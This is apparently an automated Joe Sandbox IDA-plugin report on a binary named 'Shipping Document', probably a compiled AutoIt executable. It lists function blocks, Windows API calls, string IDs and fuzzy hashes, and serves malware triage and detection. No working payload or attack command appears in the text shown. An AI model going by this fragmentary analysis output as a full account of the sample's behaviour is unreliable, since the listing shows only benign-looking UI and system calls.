                              • Instruction ID: bff33928ad77d62b5d91dff93ed824c5d3bab580008c655bf7222bb45805b8e1
                              • Opcode Fuzzy Hash: 1a3d27777b9f109d2aa48a65ad20f8c7ad465acc97dea38d97735c127f4793ca
                              • Instruction Fuzzy Hash: B0D1B170204316DBCB24EF15C995AAE7BE1BF94354F00446CB8C65F2A2CF79E94ACB85
                              APIs
                              • SetTextColor.GDI32(?,00000000), ref: 0104A89F
                              • GetSysColorBrush.USER32(0000000F), ref: 0104A8D0
                              • GetSysColor.USER32(0000000F), ref: 0104A8DC
                              • SetBkColor.GDI32(?,000000FF), ref: 0104A8F6
                              • SelectObject.GDI32(?,?), ref: 0104A905
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0104A930
                              • GetSysColor.USER32(00000010), ref: 0104A938
                              • CreateSolidBrush.GDI32(00000000), ref: 0104A93F
                              • FrameRect.USER32(?,?,00000000), ref: 0104A94E
                              • DeleteObject.GDI32(00000000), ref: 0104A955
                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0104A9A0
                              • FillRect.USER32(?,?,?), ref: 0104A9D2
                              • GetWindowLongW.USER32(?,000000F0), ref: 0104A9FD
                                • Part of subcall function 0104AB60: GetSysColor.USER32(00000012), ref: 0104AB99
                                • Part of subcall function 0104AB60: SetTextColor.GDI32(?,?), ref: 0104AB9D
                                • Part of subcall function 0104AB60: GetSysColorBrush.USER32(0000000F), ref: 0104ABB3
                                • Part of subcall function 0104AB60: GetSysColor.USER32(0000000F), ref: 0104ABBE
                                • Part of subcall function 0104AB60: GetSysColor.USER32(00000011), ref: 0104ABDB
                                • Part of subcall function 0104AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0104ABE9
                                • Part of subcall function 0104AB60: SelectObject.GDI32(?,00000000), ref: 0104ABFA
                                • Part of subcall function 0104AB60: SetBkColor.GDI32(?,00000000), ref: 0104AC03
                                • Part of subcall function 0104AB60: SelectObject.GDI32(?,?), ref: 0104AC10
                                • Part of subcall function 0104AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0104AC2F
                                • Part of subcall function 0104AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0104AC46
                                • Part of subcall function 0104AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0104AC5B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                              • String ID:
                              • API String ID: 4124339563-0
                              • Opcode ID: 861b8481e89d121ef4df4aa023d4c0d186671f7e99ee7c8b2eb161a19b2633ae
                              • Instruction ID: c42c9059b6e0cb47b1241efff7f2a83a07509ef2c2443709bb46f9ef6a159a9d
                              • Opcode Fuzzy Hash: 861b8481e89d121ef4df4aa023d4c0d186671f7e99ee7c8b2eb161a19b2633ae
                              • Instruction Fuzzy Hash: 31A1A2B5108302EFD7219F68DD88A5B7BE9FF89321F000A29FAA2971D1D735D844CB51
                              APIs
                              • DestroyWindow.USER32(?,?,?), ref: 00FC2CA2
                              • DeleteObject.GDI32(00000000), ref: 00FC2CE8
                              • DeleteObject.GDI32(00000000), ref: 00FC2CF3
                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00FC2CFE
                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00FC2D09
                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FFC68B
                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FFC6C4
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FFCAED
                                • Part of subcall function 00FC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FC2036,?,00000000,?,?,?,?,00FC16CB,00000000,?), ref: 00FC1B9A
                              • SendMessageW.USER32(?,00001053), ref: 00FFCB2A
                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FFCB41
                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FFCB57
                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FFCB62
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                              • String ID: 0
                              • API String ID: 464785882-4108050209
                              • Opcode ID: b40a9af67b01e42d17074cc23e799de85a7a121e38015b9eae71dfaf0dac1079
                              • Instruction ID: b8cae5465f6a3d910a9bceb3e2a529d98a33003a45fe3a0582e25c298c87d196
                              • Opcode Fuzzy Hash: b40a9af67b01e42d17074cc23e799de85a7a121e38015b9eae71dfaf0dac1079
                              • Instruction Fuzzy Hash: 3012A03590021AEFDB24DF24CA85BB9BBE1FF44320F14456DEA85DB262C735E841EB90
                              APIs
                              • DestroyWindow.USER32(00000000), ref: 010377F1
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 010378B0
                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010378EE
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 01037900
                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01037946
                              • GetClientRect.USER32(00000000,?), ref: 01037952
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01037996
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 010379A5
                              • GetStockObject.GDI32(00000011), ref: 010379B5
                              • SelectObject.GDI32(00000000,00000000), ref: 010379B9
                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010379C9
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010379D2
                              • DeleteDC.GDI32(00000000), ref: 010379DB
                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01037A07
                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 01037A1E
                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01037A59
                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01037A6D
                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 01037A7E
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 01037AAE
                              • GetStockObject.GDI32(00000011), ref: 01037AB9
                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01037AC4
                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 01037ACE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                              • API String ID: 2910397461-517079104
                              • Opcode ID: 403b5516b61653b0a588cac2d789b68cbe17b1a7beecf85b93f8ed068dcba8de
                              • Instruction ID: a504dc59e669b91f2887219447487e92a680361c7a1de9778b946d7592efaee4
                              • Opcode Fuzzy Hash: 403b5516b61653b0a588cac2d789b68cbe17b1a7beecf85b93f8ed068dcba8de
                              • Instruction Fuzzy Hash: 95A196B5A40606BFEB24DF68DD4AFAE7BB9EB44710F014154FA54A71D0C779AD00CB60
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0102AF89
                              • GetDriveTypeW.KERNEL32(?,0104FAC0,?,\\.\,0104F910), ref: 0102B066
                              • SetErrorMode.KERNEL32(00000000,0104FAC0,?,\\.\,0104F910), ref: 0102B1C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorMode$DriveType
                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                              • API String ID: 2907320926-4222207086
                              • Opcode ID: 007681081fcdf35d0882d36edb6258f1ef7f175fc2ab3016000ed6c37aeebe99
                              • Instruction ID: 0218adf4346e0520db469ca07c4e59ace30f7f94e9241b97c4a168295f6f3456
                              • Opcode Fuzzy Hash: 007681081fcdf35d0882d36edb6258f1ef7f175fc2ab3016000ed6c37aeebe99
                              • Instruction Fuzzy Hash: 3651D130B84716EBCB10EB15CE92DBCB7B0FB54641764805EF4CBAB250CA79AD41CB45
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                              • API String ID: 1038674560-86951937
                              • Opcode ID: d91eddaee86579fa250420dbb9fe201e7dbc677d0db4fca6635e10eebd95f46e
                              • Instruction ID: 59d236a816cd00372725bd10534d8511f77ecc2d121c9c008cfe9c33b7e17e9e
                              • Opcode Fuzzy Hash: d91eddaee86579fa250420dbb9fe201e7dbc677d0db4fca6635e10eebd95f46e
                              • Instruction Fuzzy Hash: 79814A71A04247ABCB24BE21CE97FBF3759AF14710F044029FD41EA0A1EB69DE41F690
                              APIs
                              • GetSysColor.USER32(00000012), ref: 0104AB99
                              • SetTextColor.GDI32(?,?), ref: 0104AB9D
                              • GetSysColorBrush.USER32(0000000F), ref: 0104ABB3
                              • GetSysColor.USER32(0000000F), ref: 0104ABBE
                              • CreateSolidBrush.GDI32(?), ref: 0104ABC3
                              • GetSysColor.USER32(00000011), ref: 0104ABDB
                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0104ABE9
                              • SelectObject.GDI32(?,00000000), ref: 0104ABFA
                              • SetBkColor.GDI32(?,00000000), ref: 0104AC03
                              • SelectObject.GDI32(?,?), ref: 0104AC10
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0104AC2F
                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0104AC46
                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0104AC5B
                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0104ACA7
                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0104ACCE
                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0104ACEC
                              • DrawFocusRect.USER32(?,?), ref: 0104ACF7
                              • GetSysColor.USER32(00000011), ref: 0104AD05
                              • SetTextColor.GDI32(?,00000000), ref: 0104AD0D
                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0104AD21
                              • SelectObject.GDI32(?,0104A869), ref: 0104AD38
                              • DeleteObject.GDI32(?), ref: 0104AD43
                              • SelectObject.GDI32(?,?), ref: 0104AD49
                              • DeleteObject.GDI32(?), ref: 0104AD4E
                              • SetTextColor.GDI32(?,?), ref: 0104AD54
                              • SetBkColor.GDI32(?,?), ref: 0104AD5E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                              • String ID:
                              • API String ID: 1996641542-0
                              • Opcode ID: 38a87b2424cf6bdd6a3fd9e6ba3aeba99a425ae3646226817c94fd49f20b3624
                              • Instruction ID: 6676ae296849584af1c6c83f06e8f41e410f46f792a9a5e8c8fc8bfee03ee246
                              • Opcode Fuzzy Hash: 38a87b2424cf6bdd6a3fd9e6ba3aeba99a425ae3646226817c94fd49f20b3624
                              • Instruction Fuzzy Hash: EF6191B5900209EFDF219FA8DD88EAE7BB9FB08320F104565FA51AB291D7759940CF90
                              APIs
                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01048D34
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01048D45
                              • CharNextW.USER32(0000014E), ref: 01048D74
                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01048DB5
                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01048DCB
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01048DDC
                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01048DF9
                              • SetWindowTextW.USER32(?,0000014E), ref: 01048E45
                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01048E5B
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 01048E8C
                              • _memset.LIBCMT ref: 01048EB1
                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01048EFA
                              • _memset.LIBCMT ref: 01048F59
                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01048F83
                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 01048FDB
                              • SendMessageW.USER32(?,0000133D,?,?), ref: 01049088
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 010490AA
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010490F4
                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01049121
                              • DrawMenuBar.USER32(?), ref: 01049130
                              • SetWindowTextW.USER32(?,0000014E), ref: 01049158
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                              • String ID: 0
                              • API String ID: 1073566785-4108050209
                              • Opcode ID: 39c0106074e5de4285ab2cc59bc4cd43ca6f03c31e5259f9e445de8d186a2409
                              • Instruction ID: de15dfd70bf457fe1718f6b0d63df0b4ad0dc38b63ffbd1ea237b82dbd74e30c
                              • Opcode Fuzzy Hash: 39c0106074e5de4285ab2cc59bc4cd43ca6f03c31e5259f9e445de8d186a2409
                              • Instruction Fuzzy Hash: B1E1B4B4901209ABDF209FA5CCC8EEF7BB8FF09754F0085AAFA959A190D7758641CF50
                              APIs
                              • GetCursorPos.USER32(?), ref: 01044C51
                              • GetDesktopWindow.USER32 ref: 01044C66
                              • GetWindowRect.USER32(00000000), ref: 01044C6D
                              • GetWindowLongW.USER32(?,000000F0), ref: 01044CCF
                              • DestroyWindow.USER32(?), ref: 01044CFB
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01044D24
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01044D42
                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01044D68
                              • SendMessageW.USER32(?,00000421,?,?), ref: 01044D7D
                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01044D90
                              • IsWindowVisible.USER32(?), ref: 01044DB0
                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01044DCB
                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01044DDF
                              • GetWindowRect.USER32(?,?), ref: 01044DF7
                              • MonitorFromPoint.USER32(?,?,00000002), ref: 01044E1D
                              • GetMonitorInfoW.USER32(00000000,?), ref: 01044E37
                              • CopyRect.USER32(?,?), ref: 01044E4E
                              • SendMessageW.USER32(?,00000412,00000000), ref: 01044EB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                              • String ID: ($0$tooltips_class32
                              • API String ID: 698492251-4156429822
                              • Opcode ID: dc4745004e8933d05c654bea73b4708350c5a05d6df386f21259467189a0cf67
                              • Instruction ID: 48e894bc250555cd757f3059c0f09554ca2ae632cf322b66d37acf1c0f890e91
                              • Opcode Fuzzy Hash: dc4745004e8933d05c654bea73b4708350c5a05d6df386f21259467189a0cf67
                              • Instruction Fuzzy Hash: 14B17DB1608341AFD754DF29C989B5ABBE4BF88310F00892CF5D9DB291DB75D804CB95
                              APIs
                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 010246E8
                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0102470E
                              • _wcscpy.LIBCMT ref: 0102473C
                              • _wcscmp.LIBCMT ref: 01024747
                              • _wcscat.LIBCMT ref: 0102475D
                              • _wcsstr.LIBCMT ref: 01024768
                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01024784
                              • _wcscat.LIBCMT ref: 010247CD
                              • _wcscat.LIBCMT ref: 010247D4
                              • _wcsncpy.LIBCMT ref: 010247FF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                              • API String ID: 699586101-1459072770
                              • Opcode ID: 226ed16d69e01a6aaab11c230698854de4c8a7a402491d0acbb1b72f3f901a7b
                              • Instruction ID: 20769d3fed07107bafff9641fce845a0715074dc252447592b4869b3ac95152c
                              • Opcode Fuzzy Hash: 226ed16d69e01a6aaab11c230698854de4c8a7a402491d0acbb1b72f3f901a7b
                              • Instruction Fuzzy Hash: 64416B71A00291BBE710B77A9C47EBF77BCEF01710F04016AF941E7142EB79A601A7A5
                              APIs
                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FC28BC
                              • GetSystemMetrics.USER32(00000007), ref: 00FC28C4
                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FC28EF
                              • GetSystemMetrics.USER32(00000008), ref: 00FC28F7
                              • GetSystemMetrics.USER32(00000004), ref: 00FC291C
                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FC2939
                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FC2949
                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FC297C
                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FC2990
                              • GetClientRect.USER32(00000000,000000FF), ref: 00FC29AE
                              • GetStockObject.GDI32(00000011), ref: 00FC29CA
                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC29D5
                                • Part of subcall function 00FC2344: GetCursorPos.USER32(?), ref: 00FC2357
                                • Part of subcall function 00FC2344: ScreenToClient.USER32(010867B0,?), ref: 00FC2374
                                • Part of subcall function 00FC2344: GetAsyncKeyState.USER32(00000001), ref: 00FC2399
                                • Part of subcall function 00FC2344: GetAsyncKeyState.USER32(00000002), ref: 00FC23A7
                              • SetTimer.USER32(00000000,00000000,00000028,00FC1256), ref: 00FC29FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                              • String ID: AutoIt v3 GUI
                              • API String ID: 1458621304-248962490
                              • Opcode ID: be777b317f3788a4b4d5e51a86fd282298a6aa2e02f37fbcc6f9f3e37486f889
                              • Instruction ID: 0d69264aa33b7c29492c8b44fcc978ae17a4398bc8131ba5f6b649f1fae04ff5
                              • Opcode Fuzzy Hash: be777b317f3788a4b4d5e51a86fd282298a6aa2e02f37fbcc6f9f3e37486f889
                              • Instruction Fuzzy Hash: F8B18075A0020BEFDB24DF68DA85FAD7BB4FF08310F114219FA55E6294DB799800DB90
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 010440F6
                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 010441B6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BuffCharMessageSendUpper
                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                              • API String ID: 3974292440-719923060
                              • Opcode ID: fa7cce0dfed28b756ac9d0e972ced77ab06ad44c0824ebceaee5280b9cb8dd4f
                              • Instruction ID: a50686ae4ef0dbd1f30517b3439c90ce8ee5614afab6c3b64e69a0e286e1b561
                              • Opcode Fuzzy Hash: fa7cce0dfed28b756ac9d0e972ced77ab06ad44c0824ebceaee5280b9cb8dd4f
                              • Instruction Fuzzy Hash: C5A18E702143029BCB14EF24CE92F6AB7E5BF84314F04896CA8D69B692DF78EC05CB51
                              APIs
                              • LoadCursorW.USER32(00000000,00007F89), ref: 01035309
                              • LoadCursorW.USER32(00000000,00007F8A), ref: 01035314
                              • LoadCursorW.USER32(00000000,00007F00), ref: 0103531F
                              • LoadCursorW.USER32(00000000,00007F03), ref: 0103532A
                              • LoadCursorW.USER32(00000000,00007F8B), ref: 01035335
                              • LoadCursorW.USER32(00000000,00007F01), ref: 01035340
                              • LoadCursorW.USER32(00000000,00007F81), ref: 0103534B
                              • LoadCursorW.USER32(00000000,00007F88), ref: 01035356
                              • LoadCursorW.USER32(00000000,00007F80), ref: 01035361
                              • LoadCursorW.USER32(00000000,00007F86), ref: 0103536C
                              • LoadCursorW.USER32(00000000,00007F83), ref: 01035377
                              • LoadCursorW.USER32(00000000,00007F85), ref: 01035382
                              • LoadCursorW.USER32(00000000,00007F82), ref: 0103538D
                              • LoadCursorW.USER32(00000000,00007F84), ref: 01035398
